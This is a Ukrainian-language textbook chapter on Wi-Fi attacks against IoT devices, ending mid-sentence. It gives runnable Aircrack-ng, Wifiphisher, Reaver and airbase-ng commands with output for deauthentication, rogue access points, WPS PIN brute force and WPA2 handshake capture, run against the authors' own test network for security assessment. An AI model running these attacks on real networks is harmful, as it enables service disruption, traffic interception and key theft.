Обладнання середнього радіусу дії дозволяє бездротово з’єднувати різні пристрої один з одним на відстані до 100 метрів. У цьому розділі нашої дискусії ми зосередимось на технології Wi-Fi, яка є однією з найпопулярніших серед пристроїв Інтернету речей (IoT). Ми розглянемо основи того, як працює бездротовий стандарт Wi-Fi, а потім поглибимося у деталі, щоб описати деякі з основних видів атак, які можуть виникнути в цьому контексті. По-перше, давайте з’ясуємо, як саме функціонує технологія Wi-Fi. Wi-Fi, або бездротовий Інтернет, є стандартом для бездротового з’єднання пристроїв з Інтернетом та одне з ключових досягнень в галузі комунікаційних технологій. Він дозволяє пристроям обмінюватися даними через радіохвилі замість традиційних дротових з’єднань.
Wi-Fi працює на основі радіохвиль і використовує різні радіочастоти для передачі та прийому даних між пристроями. Кожен пристрій, підключений до Wi-Fi, має свій власний унікальний ідентифікатор, відомий як MAC-адреса, яка використовується для ідентифікації в мережі. Пристрої, які підключені до однієї і тієї ж Wi-Fi мережі, можуть обмінюватися даними через бездротовий канал. У цьому розділі ми розглянули деякі основи бездротового зв’язку Wi-Fi і виділили деякі з основних видів атак, які можуть бути виконані в цьому контексті. Знання цих атак та їх можливих наслідків може допомогти вирішити питання безпеки мережі Wi-Fi та захистити пристрої IoT від потенційних загроз.
Інші радіотехнології середнього радіусу дії, такі як Thread, Zigbee і Z-Wave, були розроблені для низькошвидкісних додатків з максимальною швидкістю 250 Кбіт/с, але підключення до Wi-Fi передбачає високошвидкісну передачу даних. Крім того, Wi-Fi споживає більше енергії, ніж інші технології.
Для підключення до мережі Wi-Fi використовується точка доступу (AP) – мережевий пристрій, який дає змогу підключатися до мережі за допомогою пристроїв Wi-Fi, а також клієнтський пристрій, який може підключатися до точки доступу. Коли клієнт успішно підключається до точки доступу і дані вільно переміщуються між ними, ми говоримо, що клієнт пов’язаний із точкою доступу. Ми часто використовуємо термін станція (STA) для позначення будь-якого пристрою, який є які можуть використовувати протокол Wi-Fi.
Мережа Wi-Fi може працювати як у відкритому, так і в захищеному режимі. У відкритому режимі точка доступу не вимагає автентифікації та приймає будь-який клієнт, який намагається підключитися. У захищеному режимі клієнт повинен пройти процес автентифікації, перш ніж підключитися до точки доступу. Деякі мережі також можуть бути прихованими; у цьому випадку мережа не передаватиме свій ESSID. ESSID – це назва мережі, наприклад гостьова або безкоштовна Wi-Fi. BSSID – це MAC-адреса мережі.
З’єднання Wi-Fi обмінюються даними за допомогою набору протоколів 802.11, який реалізує зв’язок Wi-Fi. У списку 802.11 перераховано понад 15 різних протоколів, і вони позначаються буквами. Можливо, ви вже знайомі зі стандартом 802.11 a/b/g/n/ac, оскільки ви, можливо, використовували деякі або навіть усі з них протягом останніх 20 років. Протоколи підтримують різні типи модуляції та працюють на різних частотах та фізичних рівнях.
У стандарті 802.11 дані передаються за допомогою трьох основних типів фреймів: власне дані, керування та керування. У цьому розділі ми розглянемо лише фрейми керування. Фрейм управління, як випливає з його назви, керує мережею, наприклад, він використовується в мережевому пошуку, аутентифікації клієнта і навіть для зв’язування клієнтів з точками доступу.
Як правило, оцінка безпеки Wi-Fi включає атаки на точки доступу та бездротові станції. Коли справа доходить до тестування мереж IoT, обидва види атак мають вирішальне значення, оскільки все більше і більше пристроїв можуть або підключатися до мережі Wi-Fi, або діяти як точки доступу.
Якщо ви орієнтуєтеся на пристрої IoT в оцінці бездротового зв’язку, вам знадобиться бездротова карта, яка підтримує режим моніторингу точки доступу та здатна додавати потрібні пакети до трафіку. Режим моніторингу дозволяє вашому пристрою відстежувати весь трафік, який він отримує від бездротової мережі. Можливості ін’єкції пакетів дозволяють вашій карті підробляти пакети, щоб вони виглядали так, ніби вони надійшли з іншого джерела. Для цілей цієї глави ми використовували мережеву карту Alfa Atheros AWUS036NHA.
Крім того, вам може знадобитися спеціальна точка доступу для тестування різних налаштувань Wi-Fi. Ми використовували портативну точку доступу TP-Link, але підійде будь-яка. Якщо атаки не є частиною діяльності червоної команди, потужність передачі точки доступу або тип антени, яку ви використовуєте, не мають особливого значення.
Атаки на бездротові клієнти зазвичай використовують той факт, що керуючі кадри стандарту 802.11 не захищені криптографічно, що робить пакети вразливими до перехоплення, модифікації або повторного відтворення. Ви можете виконувати всі ці атаки за допомогою безлічі асоціативних атак типу “людина посередині”. Зловмисники також можуть здійснювати атаки деавтентифікації та відмови в обслуговуванні, які порушують з’єднання Wi-Fi жертви з точкою доступу.
Деаутентифікація та атаки типу «відмова в обслуговуванні»
Контрольні фрейми в стандарті 802.11 не можуть перешкодити зловмиснику підробити MAC-адресу пристрою. В результаті зловмисник може підробити кадри Deauthenticate або Disassociate. Це кадри керування, які зазвичай надсилаються для завершення з’єднання клієнта з точкою доступу. Наприклад, вони відправляються, якщо клієнт підключається до іншої точки доступу або просто відключається від вихідної мережі. При зламі зловмисник може використовувати ці кадри, розірвати існуючі зв’язки з конкретними клієнтами.
Крім того, замість того, щоб відключати клієнта від точки доступу, зловмисник може переповнити точку доступу запитами на автентифікацію. Вони, у свою чергу, спричиняють відмову в обслуговуванні, перешкоджаючи законним клієнтам підключитися до точки доступу. Обидві атаки є відомими атаками типу «відмова в обслуговуванні», які були частково усунені в стандарті 802.11w, але поки що не набули широкого поширення у світі Інтернету речей. У цьому розділі ми виконаємо атаку деавтентифікації, яка відключає всі бездротові клієнти від точки доступу.
Почніть із встановлення пакета Aircrack-ng, якщо ви не використовуєте Kali, де він попередньо встановлений. Aircrack-ng містить інструменти оцінки Wi-Fi. Переконайтеся, що мережева карта, вбудована в пакети, підключена до комп’ютера. Потім за допомогою утиліти iwconfig визначте ім’я інтерфейсу, яке належить бездротовій карті, підключеній до вашої системи:
# apt-get install aircrack-ng # iwconfig docker0 no wireless extensions. lo no wireless extensions. wlan0 IEEE 802.11 ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short long limit:2 RTS thr:off Fragment thr:off Encryption key:off Power Management:off eth0 no wireless extensions.
У вихідному повідомленні утиліти вказується, що бездротовий інтерфейс – wlan0.
Оскільки деякі процеси в системі можуть заважати роботі інструментів Aircrack-ng, використовуйте інструмент Airmon-ng для виявлення та автоматичної зупинки цих процесів. Для цього спочатку відключаємо бездротовий інтерфейс за допомогою ifconfig:
# ifconfig wlan0 down # airmon-ng check kill Killing these processes: PID Name 731 dhclient 1357 wpa_supplicant
Тепер переведіть бездротову карту в режим моніторингу за допомогою Airmon-ng:
# airmon-ng start wlan0 PHY Interface Driver Chipset phy0 wlan0 ath9k_htc Qualcomm Atheros Communications AR9271 802.11n (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0)
Цей інструмент створює новий інтерфейс під назвою wlan0mon, яким ви можете скористатися для запуску базового сеансу сніфінгу за допомогою Airodump-ng. Наведена нижче команда визначає BSSID (її MAC-адресу) точки доступу та канал, на якому вона працює:
# airodump-ng wlan0mon CH 11 ][ Elapsed: 36 s ][ 2019-09-19 10:47 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 6F:20:92:11:06:10 -77 15 0 0 6 130 WPA2 CCMP PSK ZktT 2.4Ghz 6B:20:9F:10:15:6E -85 14 0 0 11 130 WPA2 CCMP PSK 73ad 2.4Ghz 7C:31:53:D0:A7:CF -86 13 0 0 11 130 WPA2 CCMP PSK A7CF 2.4Ghz 82:16:F9:6E:FB:56 -40 11 39 0 6 65 WPA2 CCMP PSK Secure Home E5:51:61:A1:2F:78 -90 7 0 0 1 130 WPA2 CCMP PSK EE-cwwnsa
У цьому прикладі BSSID — 82:16:F9:6E:FB:56, канал — 6. Ми передаємо ці дані в Airodump-ng для ідентифікації клієнтів, підключених до точки доступу:
# airodump-ng wlan0mon --bssid 82:16:F9:6E:FB:56 CH 6 |[ Elapsed: 42 s ] [ 2019-09-19 10:49 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 82:16:F9:6E:FB:56 -37 24 267 2 6 65 WPA2 CCMP PSK Secure Home BSSID STATION PWR Rate Lost Frames Probe 82:16:F9:6E:FB:56 50:82:D5:DE:6F:45 -28 0e- 0e 904 274
На основі цього результату ми ідентифікуємо єдиного клієнта, підключеного до точки доступу. Клієнт володіє BSSID 50:82:D5:DE:6F:45 (MAC-адреса інтерфейсу бездротової мережі). Тепер ви можете відправити клієнту багато пакетів відключення, щоб він втратив інтернет-з’єднання. Для здійснення атаки використовуємо Aireplay-ng:
# aireplay-ng --deauth 0 -c 50:82:D5:DE:6F:45 -a 82:16:F9:6E:FB:56 wlan0mon
Параметр –deauth визначає атаку розв’язки та кількість пакетів роз’єднання, які слід надіслати. Вибір 0 означає, що пакети надсилатимуться безперервно. Параметр -a визначає BSSID точки доступу, а параметр -c визначає цільові пристрої. У наведеному нижче списку показано дані, виведені вищезгаданою командою:
11:03:55 Waiting for beacon frame (BSSID: 82:16:F9:6E:FB:56) on channel 6 11:03:56 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [ 0|64 ACKS] 11:03:56 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [66|118 ACKS] 11:03:57 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [62|121 ACKS] 11:03:58 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [64|124 ACKS] 11:03:58 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [62|110 ACKS] 11:03:59 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [64|75 ACKS] 11:03:59 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [63|64 ACKS] 11:03:00 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [21|61 ACKS] 11:03:00 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [ 0|67 ACKS] 11:03:01 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [ 0|64 ACKS] 11:03:02 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [ 0|61 ACKS] 11:03:02 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [ 0|66 ACKS] 11:03:03 Sending 64 directed DeAuth (code 7). STMAC [50:82:D5:DE:6F:45] [ 0|65 ACKS]
Тут показані пакети відключення, надіслані цільовій об’єкту. Атака успішна, коли цільовий пристрій стає недосяжним. Коли ви перевірите цей пристрій, ви побачите, що він більше не підключений до жодної мережі.
Ви також можете виконувати атаки типу «відмова в обслуговуванні» проти Wi-Fi іншими способами. Радіоперешкоди, ще один поширений метод, створюють перешкоди для бездротового зв’язку незалежно від бездротового протоколу. У цій атаці зловмисник використовує програмно-визначений радіопристрій або дешеві стандартні ключі Wi-Fi, щоб передавати радіосигнали та робити бездротовий канал непридатним для використання іншими пристроями. Таку атаку ми покажемо в главі 15.
Крім того, ви можете виконати вибіркове глушіння, складну версію атаки глушіння, під час якої зловмисник перехоплює лише певні пакети, важливі для підтримки дійсного з’єднання.
Варто зазначити, що для деяких чіпсетів атаки деаутентифікації також можуть знизити рівень ключів шифрування, які використовуються для зв’язку між точкою доступу та клієнтом. Нещодавнє дослідження, проведене антивірусною компанією ESET, виявило цю вразливість, яка отримала назву Kr00k (CVE-2019-15126). Атаковані чіпи Wi-Fi використовують нульовий ключ шифрування при повторному підключенні, що дозволяє зловмисникам розшифровувати пакети, передані ураженим пристроєм.
Атака на з’єднання обманом змушує бездротову станцію підключитися до контрольованої зловмисником точки доступу. Якщо цільова станція вже підключена до якоїсь іншої мережі, зловмисник зазвичай починає з реалізації одного з методів деаутентифікації, який ми щойно описали. Після того, як цільовий пристрій втратив з’єднання з законною точкою доступу, зловмисник може заманити його в шахрайську мережу, зловживаючи різними функціями своєї мережі Голова.
У цьому розділі ми коротко опишемо найпопулярніші атаки на з’єднання, а потім продемонструємо атаку під назвою Known Beacons.
Атака злих близнюків
Найпоширенішою асоціативною атакою є «Злий близнюк», коли клієнта обманом змушують підключитися до фальшивої точки доступу, змушуючи його повірити, що він підключається до відомої та законної точки доступу.
Ми можемо створити фальшиву точку доступу за допомогою мережевого адаптера з функціями моніторингу та введення пакетів. За допомогою цієї мережевої картки ми налаштували точку доступу та налаштували її канал, ESSID і BSSID, не забувши скопіювати ESSID і тип шифрування законної точки доступу. Тепер ми надішлемо сильніший сигнал на цільовий пристрій, ніж сигнал справжньої точки доступу. Ви можете покращити свій сигнал, використовуючи різні методи, наприклад, розташувавшись ближче до цілі, ніж поточна точка доступу, або використовуючи більш ефективну антену.
Атака КАРМА
Атаки KARMA з ‘єднують користувачів з незахищеними мережами, використовуючи вразливість у клієнтах, налаштованих на автоматичне виявлення знайомих бездротових мереж. У такій конфігурації клієнт видає прямий тестовий запит, запитуючи конкретні точки доступу, а потім підключається до знайденої точки без аутентифікації. Запит зондування — це кадр керування, який ініціює процес прив’язки. З огляду на таку конфігурацію, зловмисник може просто підтвердити будь-який із запитів клієнта та підключити його до своєї шахрайської точки доступу.
Щоб атака KARMA спрацювала, пристрої, які ви атакуєте, повинні відповідати трьом вимогам. Цільова мережа повинна мати тип Відкритий, у клієнта повинен бути включений прапорець AutoConnect, а клієнт повинен транслювати свій список бажаних мереж. Список бажаних мереж – це список мереж, до яких клієнт раніше підключався та яким довіряє. Клієнт з увімкненим прапорцем AutoConnect автоматично підключається до точки доступу, якщо точка доступу надішле йому ESSID, який уже вказано в списку бажаних мереж клієнта.
Більшість сучасних операційних систем не вразливі до атак KARMA, оскільки вони не надсилають списки бажаних мереж, але іноді ви можете зіткнутися з вразливою системою в старих пристроях IoT або принтерах. Якщо пристрій коли-небудь підключався до відкритої мережі, що приховує його ESSID, він, безумовно, вразливий до атаки KARMA. Причина в тому, що єдиним способом підключитися до відкритих мереж, що приховують свій ESSID, є відправка їм прямого запиту, в цьому випадку створюються всі умови, необхідні для KARMA-атак.
Атака Known Beacons
Після викриття атаки KARMA більшість операційних систем перестали безпосередньо зондувати точки доступу; замість цього вони використовують тільки пасивне спостереження, при якому пристрій прослуховує відомий ESSID з мережі. Така поведінка повністю виключає всі випадки атак KARMA.
Атака Known Beacons обходить цю функцію безпеки, використовуючи той факт, що багато операційних систем за замовчуванням включають прапорець AutoConnect. Оскільки точки доступу часто мають дуже поширені назви, зловмисник може вгадати ESSID відкритої мережі в списку бажаних мереж пристрою. Потім він обманом змушує цей пристрій автоматично підключатися до точки доступу, контрольованої зловмисником.
У більш складній версії атаки зловмисник може використовувати словник поширених ESSID, таких як Guest, FREE Wi-Fi тощо, до яких жертва, ймовірно, підключалася в минулому. Це дуже схоже на спробу отримати несанкціонований доступ до службового облікового запису шляхом простого перебору імені користувача, коли пароль не потрібен: досить проста, але ефективна атака.
На малюнку 12.1 показана атака Known Beacons
Точка доступу зловмисника починається з передачі кількох кадрів маяка, типу кадру керування, який містить усю інформацію про мережу. Цей кадр регулярно транслюється, щоб повідомити пристроям про наявність мережі. Якщо жертва має інформацію про цю мережу в списку бажаних мереж (оскільки жертва вже підключалася до цієї мережі в минулому) і якщо точки доступу зловмисника та жертви мають тип Відкритий, Жертва надішле тестовий запит і підключиться до нього.
Перш ніж ми зможемо виконати цю атаку, нам потрібно налаштувати наші пристрої. На деяких пристроях можна змінити прапорець автопідключення. Розташування цього параметра відрізняється від пристрою до пристрою, але зазвичай його можна знайти в налаштуваннях Wi-Fi, як показано на малюнку 12.2, у такому параметрі, як Автоматичне повторне підключення. Переконайтеся, що цю опцію ввімкнено.
Потім налаштуйте відкриту точку доступу під назвою my_essid. Ми зробили це за допомогою портативної точки доступу TP-Link, але ви можете використовувати будь-який пристрій на свій вибір. Після налаштування підключіть цільовий пристрій до мережі my_essid. Далі встановіть Wifiphisher (https://github.com/wifiphisher/wifiphisher/), шахрайську платформу точки доступу, яка часто використовується для оцінки мережевої безпеки:
$ sudo apt-get install libnl-3-dev libnl-genl-3-dev libssl-dev $ git clone https://github.com/wifiphisher/wifiphisher.git $ cd wifiphisher && sudo python3 setup.py install
Wifiphisher повинен націлитися на певну мережу, щоб почати атакувати клієнтів цієї мережі. Ми створюємо тестову мережу, яка також називається my_essid, щоб уникнути випадкового впливу на зовнішніх клієнтів, коли у нас немає на це дозволу:
# wifiphisher -nD –essid my_essid -kB [*] Starting Wifiphisher 1.4GIT ( https://wifiphisher.org ) at 2019-08-19 03:35 [+] Timezone detected. Setting channel range to 1-13 [+] Selecting wfphshr-wlan0 interface for the deauthentication attack [+] Selecting wlan0 interface for creating the rogue Access Point [+] Changing wlan0 MAC addr (BSSID) to 00:00:00:yy:yy:yy [+] Changing wlan0 MAC addr (BSSID) to 00:00:00:xx:xx:xx [+] Sending SIGKILL to wpa_supplicant [*] Cleared leases, started DHCP, set up iptables [+] Selecting OAuth Login Page template
Запускаємо Wifiphisher як Known Beacons, додаючи аргумент -kB. Вам не потрібно надавати список слів для атаки, тому що у Wifiphisher він вбудований. Список слів містить спільні ESSID, до яких жертва могла підключитися у минулому. Після запуску команди має відкритися інтерфейс WifiPhisher, як показано на мал. 12.3. На панелі Wifiphisher відображається кількість підключених цільових пристроїв. В даний час наш тестовий пристрій є єдиним підключеним цільовим пристроєм. Перегляньте список кращих мереж для пристрою, який ви хочете «обдурити» в цьому прикладі.
Наприклад, на мал. 12.4 представлений список кращих мереж на пристрої Samsung Galaxy S8+. Зверніть увагу, що у ньому збережено дві мережі; перша з них, FreeAirportWiFi, має назву, що легко вгадується.
Звичайно, після того, як ми здійснимо атаку, пристрій повинен відключитися від своєї поточної мережі і підключитися до шкідливої, підробленої мережі (мал. 12.5).
З цього моменту зловмисник може діяти як «людина посередині», стежачи за дорожнім рухом жертви або навіть заважаючи йому.
Wi-Fi Direct – це стандарт Wi-Fi, який дозволяє пристроям підключатися один до одного без бездротової точки доступу. У традиційній архітектурі всі пристрої підключаються до однієї точки доступу для зв’язку один з одним. У Wi-Fi Direct, навпаки, один із двох пристроїв діє як точка доступу. Ми називаємо такий пристрій власником групи. Щоб Wi-Fi Direct працював, стандарт Wi-Fi Direct повинен відповідати лише власнику групи.
Wi-Fi Direct можна знайти на таких пристроях, як принтери, телевізори, ігрові консолі, аудіосистеми та пристрої потокового передавання. Багато пристроїв IoT, які підтримують Wi-Fi Direct, одночасно підключені до стандартної мережі Wi-Fi. Наприклад, домашній принтер може робити фотографії безпосередньо зі смартфона через Wi-Fi Direct, але, ймовірно, він також підключений до локальної мережі.
У цьому розділі ми розглянемо, як працює Wi-Fi Direct, які його основні режими роботи та які методи можна використовувати для використання функцій безпеки.
На малюнку 12.6 показано, як пристрої встановлюють з’єднання з живленням Wi-Fi Direct.
На етапі виявлення пристроїв пристрій передає повідомлення всім пристроям поблизу, запитуючи їхні MAC-адреси. На даний момент немає власника групи, тому будь-який пристрій може ініціювати цей крок. Потім, на етапі виявлення служби, пристрій отримує MAC-адреси та переходить до надсилання одноадресних запитів на кожен пристрій, запитуючи додаткову інформацію про їхні служби. Це дозволяє йому вирішувати, чи підключатися до кожного пристрою. Після фази виявлення служби два пристрої вирішують, хто буде власником групи, а хто клієнтом.
На останньому етапі Wi-Fi Direct покладається на Wi-Fi Protected Setup (WPS) для безпечного підключення пристроїв. WPS — це протокол, спочатку створений, щоб дозволити користувачам, які не надто технічно підковані, легко додавати нові пристрої до мережі. WPS пропонує кілька методів налаштування: кнопкова конфігурація (PBC), введення PIN-коду та NFC (зв’язок ближнього поля). У PBC власник групи має фізичну кнопку, при натисканні якої починається трансляція на 120 с. У цей час клієнти можуть підключатися до власника групи за допомогою власної програмної або апаратної кнопки.
Це дозволяє розгубленому користувачеві натиснути кнопку на цільовому пристрої, наприклад телевізорі, і надати доступ до стороннього та потенційно шкідливого пристрою, наприклад смартфона зловмисника. У режимі PIN-коду У власника групи є спеціальний PIN-код, який при введенні клієнтом автоматично з’єднує два пристрої. У режимі NFC це так само просто, як зблизити два пристрої, щоб з’єднати їх через мережу.
Зловмисники можуть вгадати PIN-код методом перебору. Ця атака нагадує фішингову атаку в один клік, і ви можете використовувати її з будь-яким пристроєм, який підтримує Wi-Fi Direct з введенням PIN-коду.
Ця атака використовує слабку восьмизначну атаку на шпильки WPS; через цю проблему протокол розкриває інформацію про перші чотири цифри PIN-коду, а остання цифра виступає в ролі контрольної суми, що полегшує перебір точки доступу WPS. Зверніть увагу, що деякі пристрої мають захист від перебору, зазвичай блокуючи MAC-адреси, які неодноразово намагалися ввести неправильний PIN-код. У цьому випадку складність атаки зростає, оскільки доведеться змінювати MAC-адреси в процесі перебору PIN-кодів.
У наш час ви рідко зустрінете точки доступу з увімкненим режимом WPS pin-коду, оскільки існують стандартні інструменти перебору. Один з таких інструментів, Reaver, попередньо встановлений на Kali Linux. У цьому прикладі ми будемо використовувати Reaver для перебору контакту WPS. Незважаючи на те, що ця точка доступу забезпечує захист від грубої сили за рахунок обмеження швидкості, Ми зможемо відновити PIN-код, якщо у нас буде достатньо часу. (Обмеження швидкості обмежує кількість запитів, які точка доступу прийматиме від клієнта протягом заздалегідь визначеного періоду часу.)
# reaver -i wlan0mon -b 0c:80:63:c5:1a:8a -vv Reaver v1.6.5 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@ tacnetsol.com> [+] Waiting for beacon from 0C:80:63:C5:1A:8A [+] Switching wlan0mon to channel 11 [+] Received beacon from 0C:80:63:C5:1A:8A [+] Vendor: RalinkTe [+] Trying pin "12345670" [+] Sending authentication request [!] Found packet with bad FCS, skipping...… ... [+] Received WSC NACK 344 Глава 12 [+] Sending WSC NACK [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking ... [+] WPS PIN: '23456780'
Як бачите, Reaver націлений на нашу тестову мережу та починає перебір пін-кодів. Потім ми стикаємося з обмеженням швидкості, яка сильно затримує наші зусилля, тому що Reaver автоматично робить паузу перед наступною спробою. Зрештою, ми відновлюємо пін-код WPS .
Атака EvilDirect багато в чому схожа на атаку «злого двійника», описану вище, за винятком того, що вона націлена на пристрої, які використовують Wi-Fi Direct. Ця асоціативна атака виникає в процесі з’єднання ПБК. Під час цього процесу клієнт видає запит на підключення власнику групи, а потім чекає, поки його приймуть. Власник атакуючої групи з тією самою MAC-адресою та ESSID, що працює на одному каналі, може перехопити запит і заманити клієнта-жертву підключитися до нього.
Перш ніж намагатися атакувати, вам доведеться видати себе за законного власника групи. Використовуйте Wififisher, щоб визначити цільову мережу Wi-Fi Direct. Розпакуйте посилання, ESSID і MAC-адресу власника групи, а потім створіть нового власника групи, використовуючи витягнуті дані для його налаштування. Підключіть жертву до своєї фальшивої мережі, створивши потужніший сигнал, ніж початковий власник групи, як показано вище.
Потім зупиніть будь-які процеси, які заважають роботі Airmon-ng, як ми це робили раніше в цьому розділі:
# airmon-ng check kill
Переведіть бездротовий інтерфейс у режим монітора за допомогою iwconfig:
# iwconfig eth0 no wireless extensions. lo no wireless extensions. wlan0 IEEE 802.11 ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short long limit:2 RTS thr:off Fragment thr:off Encryption key:off Power Management:off # airmon-ng start wlan0
Команда iwconfig дозволяє визначити ім’я вашого бездротового адаптера. Наш адаптер називається wlan0. Отримавши це ім’я, використовуйте команду airmon-ng start wlan0, щоб безпечно перевести його в режим моніторингу.
Потім запустіть Airbase-ng, багатоцільовий інструмент Aircrack-ng, призначений для атак на клієнтів Wi-Fi. Як аргументи командного рядка вкажіть канал (-c), ESSID (-e), BSSID (-a) та інтерфейс моніторингу, яким у нашому випадку є mon0. Ми отримали цю інформацію на попередньому кроці.
# airbase-ng -c 6 -e DIRECT-5x-BRAVIA -a BB:BB:BB:BB:BB:BB mon0 04:47:17 Created tap interface at0 04:47:17 Trying to set MTU on at0 to 1500 04:47:17 Access Point with BSSID BB:BB:BB:BB:BB:BB started. 04:47:37 Client AA:AA:AA:AA:AA:AA associated (WPA2;CCMP) to ESSID: "DIRECT-5x-BRAVIA"
У виводі зазначено, що атака була ініційована; наш цільовий клієнт тепер пов’язаний зі шкідливою точкою доступу.
На малюнку 12.7 видно, що наша атака була успішною. Нам вдалося підключити телефон жертви до підробленого телевізора BRAVIA, видаючи себе за мережу Wi-Fi Direct вихідного телевізора DIRECT-5x-BRAVIA.
У реальному прикладі нам також потрібно налаштувати DHCP-сервер для пересилання всіх пакетів до місця призначення. Таким чином, ми не перервемо зв’язок цільового пристрою з законним сервером, а його власник нічого не запідозрить.
Це не рідкість у світі Інтернету речей, де в якості точок доступу виступають пристрої IoT. Таке часто трапляється, коли пристрій створює відкриту точку доступу для процесу налаштування (наприклад, це роблять Amazon Alexa та Google Chromecast). Сучасні мобільні пристрої також можуть виступати в якості точок доступу, щоб ділитися своїм з’єднанням Wi-Fi з іншими користувачами, а розумні автомобілі мають вбудовані точки доступу Wi-Fi, які підтримують підключення 4G LTE.
Злом точки доступу зазвичай означає злом її протоколу шифрування. У цьому розділі ми розглянемо атаки на WPA і WPA2, два протоколи, які використовуються для захисту бездротових комп’ютерних мереж. WPA — це оновлена версія WEP, дуже незахищеного протоколу, який все ще можна зустріти на деяких старих пристроях IoT. WEP генерує досить короткий вектор ініціалізації всього в 24 біта, який створюється за допомогою RC4 – застарілої і небезпечної криптографічної функції. WPA2, з іншого боку, є оновленою версією WPA, яка реалізує режим шифрування на основі Advanced Encryption Standard (AES).
Давайте обговоримо мережі WPA/WPA2 Personal і Enterprise і визначимо ключові атаки на них.
Зламати мережу WPA/WPA2 можна двома способами. Перший націлений на мережі, які використовують спільні ключі. Другий націлений на поле Pairwise Master Key Identifier (PMKID) у мережах, які дозволяють роумінг зі стандартом 802.11r. У роумінгу клієнт може підключатися до різних точок доступу, що належать до однієї мережі, без необхідності повторної автентифікації для кожної з них. Незважаючи на те, що атака PMKID більш успішна, це не впливає на всі мережі WPA/WPA2, оскільки поле PMKID є необов’язковим. Атака з попереднім спільним ключем – це атака грубої сили, яка має нижчу ймовірність успіху.
Атаки зі спільним ключем
WEP, WPA та WPA2 покладаються на секретні ключі, якими обидва пристрої повинні обмінюватися, в ідеалі через захищений канал, перш ніж вони зможуть обмінюватися даними. У всіх трьох протоколах точки доступу мають однаковий спільний ключ для всіх своїх клієнтів. Щоб вкрасти цей ключ, нам потрібно перехопити повне чотиристороннє рукостискання. Чотиристороннє рукостискання WPA/WPA2 — це послідовність зв’язку, яка дозволяє точці доступу та бездротовому клієнту доводити один одному, що вони обидва знають спільний ключ, не розкриваючи його по радіо. Перехопивши чотиристороннє рукостискання, зловмисник може провести офлайн-атаку грубою силою та розкрити ключ.
Автентифікація називається розширюваним протоколом автентифікації (EAP) over LAN (EAPOL) — це чотиристороннє рукостискання, яке використовує WPA2 (мал. 12.8) для генерації кількох ключів на основі спільного ключа.
По-перше, клієнт використовує спільний ключ, який називається Pairwise-Master Key (PMK), для генерації другого ключа, який називається Pairwise Transient Key (PTK), використовуючи MAC-адреси обох пристроїв і випадкове одноразове число з обох сторін. Для цього потрібно, щоб точка доступу надіслала клієнту своє випадкове число, яке називається A-nonce. (Клієнт вже знає свою власну MAC-адресу, і він отримує адресу точки доступу, коли два пристрої починають обмінюватися даними, тому пристроям не потрібно надсилати їх знову.)
Після того, як клієнт згенерував PTK, він надсилає два елементи в точку доступу: одноразовий S-nonce і хеш PTK, який називається кодом цілісності повідомлення (MIC). Потім точка доступу самостійно генерує PTK і перевіряє отриманий MIC. Якщо MIC дійсний, точка доступу видає третій ключ, так званий спільний тимчасовий ключ (Group Temporal Key, GTK), який використовується для розшифровки та трансляції трафіку всім клієнтам. Точка доступу надсилає GTK MIC і повне значення GTK. Клієнт перевіряє їх і відповідає підтвердженням (ACK).
Пристрої надсилають усі ці повідомлення у вигляді кадрів EAPOL (тип кадру, який використовує протокол 802.1X).
Спробуємо зламати мережу WPA2. Щоб отримати ПМК, нам потрібно витягти A-nonce, S-nonce, обидві MAC-адреси та MIC PTK. Отримавши ці значення, ми можемо виконати атаку грубої сили в автономному режимі.
У цьому прикладі ми налаштували точку доступу, яка працює в режимі спільного ключа WPA2, а потім підключили до неї смартфон. Замінити клієнт можна портативним комп’ютером, смартфоном, IP-камерою або іншим пристроєм. Ми будемо використовувати Aircrack-ng для демонстрації атаки.
По-перше, переведіть бездротовий інтерфейс у режим моніторингу та видаліть BSSID точки доступу (див. Атаки на деаутентифікацію та відмову в обслуговуванні, щоб дізнатися, як це зробити). У нашому випадку ми дізналися, що точка доступу працює на каналі 1, а її BSSID – 0C:0C:0C:0C:0C:0C.
Ми проведемо пасивний моніторинг трафіку, який займе деякий час, тому що доведеться чекати, поки клієнт підключиться до точки доступу. Ви можете прискорити цей процес, відправивши пакети деаутентифікації вже підключеному клієнту. За замовчуванням деавтентифікований клієнт спробує повторно підключитися до своєї точки доступу, знову ініціювавши чотиристороннє рукостискання.
Після того, як клієнт підключений, використовуйте Airodump-ng, щоб почати захоплення кадрів, надісланих у цільову мережу:
# airmon-ng check kill # airodump-ng -c 6 --bssid 0C:0C:0C:0C:0C:0C wlan0mo -w dump
Після того, як ми захопимо кадри протягом декількох хвилин, ми почнемо атаку грубою силою, щоб зламати ключ. Це можна швидко зробити за допомогою потужності Aircrack-ng:
